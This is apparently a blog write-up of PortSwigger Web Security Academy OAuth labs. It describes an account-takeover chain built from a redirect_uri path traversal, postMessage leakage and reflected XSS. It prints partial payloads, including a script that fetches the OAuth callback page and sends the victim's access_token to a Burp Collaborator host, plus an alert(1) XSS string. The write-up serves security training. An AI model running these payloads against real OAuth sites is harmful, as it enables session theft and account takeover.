Web Security Academy : Going deep on OAuth labs and a beautiful unintended solution

PortSwigger provides some labs that is constantly updated and I like to use it to improve my web hacking skills.

Recently they released a whole new set of labs on OAuth Authentication, I solved each one, learned new things, and ended up with a interesting unintended solution for the "Expert" lab that I want to share back to the community.

This lab is a simple blogging system that allows users to login with their social network.

The admin will open every link you send. So we need to craft a one-click account takeover exploit to access the admin API key.

The intended solution

After analyzing the social media authentication request you will notice a redirect_uri parameter pointing to the oauth callback URL. This is where the system will redirect after confirming the authentication and it will append the current session access_token as URL fragment on client-side browser.


In some cases you can directly change the redirect_uri pointing to your own server leaking the access_token.


But not in this case..

There's a whitelist of redirect_uris and the URL must include the substring:


Path traversal

The whitelist forces the redirection to be fixed on this host, but not on this path, because this whitelist is vulnerable to a Path Traversal.


Will be interpreted as:


Knowing this, we can redirect the callback to everywhere on this host, but where we can redirect to leak their access_token?

Insecure web messaging scripts

After a enumeration I found some insecure web messaging scripts that create a Post Message with the data="window.location.href" when the page loads pointing to a parent listener trusting on *.

Parent Post Message trigger trusting on *

Following the Post Message content, triggered on page load.

Post message Event Listener on a comment box.

This is a perfect gadget to us, because window.location.href includes the URL fragment and the post message will propagate to every parent listener.

So, the main idea is:

  • Create a malicious web page w/ our own listener redirecting the event data to a external server;
  • Include a IFRAME to load the Callback redirecting to a Path Traversal /oauth-callback/../post/comment/comment-form where the post message trigger are stored;
  • The post message will be sent to our parent listener and the listener will dump the event data to our external server using a JS location redir.

My final payload

The expected payload to solve this lab.

window.addEventListener('message', function(e){  
  var myJSON = JSON.stringify(e.data); 

<iframe id="aaaa" src="https://ac6d1f1f1e9462a380ec24ee02f500e3.web-security-academy.net/auth?client_id=pfx6adz3dqzlgebroh99o&redirect_uri=https://acd01fa21eb0624f806f2427008a0072.web-security-academy.net/oauth-callback/../post/comment/comment-form&response_type=token&nonce=1679470272&scope=openid%20profile%20email" onload="this.contentWindow.postMessage('intrd'),'*')">  

Hosting this on a malicious web page and sending to user will leak the access_token.

And finally with this Bearer session token we can authenticate as admin, extract their APIKEY.

And submit the solution.

The unintended solution

Well, the original solution depends on this Web Message scripts.

What if there's no Web Message scripts?

So, If you enumerate this OpenID authentication server a little more you will find the OpenID Connect configuration values from the provider's Well-Known Configuration Endpoint, per the specification (http://openid.net/specs/openid-connect-discovery-1_0.html#ProviderConfigurationRequest).

The /.well-known/openid-configuration will leak all OpenID endpoints and accepted parameters.

As we know, the default response_mode is fragment, its not included on the request but you can add the parameter and get the normal redirect callback+fragments response.

Now following this OpenID configuration I noticed that we are also allowed to set form_post,fragment and query modes.

And the form_post mode will return a HTML page with a auto-submit form that includes a hidden access_token input.

You can also change the response_type to id_token token, it will return a full JWT token, useful in some cases.

HTML Injection

The same way this endpoint are vulnerable to Path Traversal, it is also vulnerable to HTML Injection.

I noticed that you can break the "> and reflect everything the callback response page, there's no filtering.

With the following payload you are able to trigger a perfect reflected XSS, and it will be processed before the callback auto-form post.


Now we have a XSS executed directly on a page containing the access_token.

We just need to find a way to dump this page content to a external server.

Trying to redirect the document.body.innerHTML to a external server

This is the most simple way to read a page content from a XSS bypassing CORS, and the first thing to came in my mind.


The redirection works, the XSS read the document.body.innerHTML URIencode and send to a external server as a parameter.

But because the synchronous nature of Javascript the page content breaks on the exact point that script is executed closing the </form> and ignoring the rest of the page, also ignoring the access_token input value.

Taking advantage of callback auto-submit form to submit a dangling form input as a new comment

This one was cool, the main idea is:

  • Use this auto-submit form generated by OpenID callback pointing to a Path traversal /oauth-callback/../post/comment
  • This will submit a new comment on the blog comment box
  • And I will use a dangling <textarea> to read the rest of the page, including the access_token input and set it as comment input value.

Pay attention on that dangling <textarea> that never closes, this will send the rest of the form as comment parameter.

Crazy idea?

It works like a charm, commented the victim access_token.

But there's a problem here, our payload has a hardcoded CSRF token and the victim session(admin) will have a different CSRF token, so we need to leak this CSRF token first and then do the post.

This sounds possible, but i've found a better way.

Asynchronous fetching the entire callback page

We already are controlling the client-side browsing why not force the client to do another callback redirect and then fetch the full response using JavaScript Fetch API?


const url = 'https://acdd1f011f7a275781d61e6c02b8005e.web-security-academy.net/auth?client_id=wt8e823bklnuhof8cekfj&redirect_uri=https://ac7b1fca1f9e271c81e31e7e00c30051.web-security-academy.net/oauth-callback&response_type=token&nonce=381190702&scope=openid%20profile%20email&response_mode=form_post';  
const intrd_collab = 'https://n6uuiwrk5slgrssutx5rgpuwtnzgn5.burpcollaborator.net';

const request = async () => {  
    const response = await fetch(url);
    const dump = await response.text();
    new Image().src=intrd_collab+'/?dump='+encodeURIComponent(dump);

</script><input "hidden" name="xxx" value="  

The idea here is:

  • Change the OpenID response_mode to form_post, returning a auto-submit callback page;
  • Use the XSS to execute a async fetch JS to the response;
  • This will do a new GET request to the callback and stores the full response into a variable;
  • URIencode this variable as a parameter and create a new Image() that point the src to a external server.

This way you can read the entire callback page content and the new Image() trick will bypass the CORS.

Final Payload (unintended way)

Putting all the things together.


When the authenticated victim clicks on the malicious link..

The entire callback page including the access_token will be leaked to our controlled server as a encoded parameter.

And we can use the session token to retrieve the API token. :)

Bonus: Another XSS

The blog post endpoint /post?postId=9&uly0j'><script>alert(1)</script>aaaa=1 will also works to trigger the XSS and I believe that it can be used to find another ways to leak the access_token.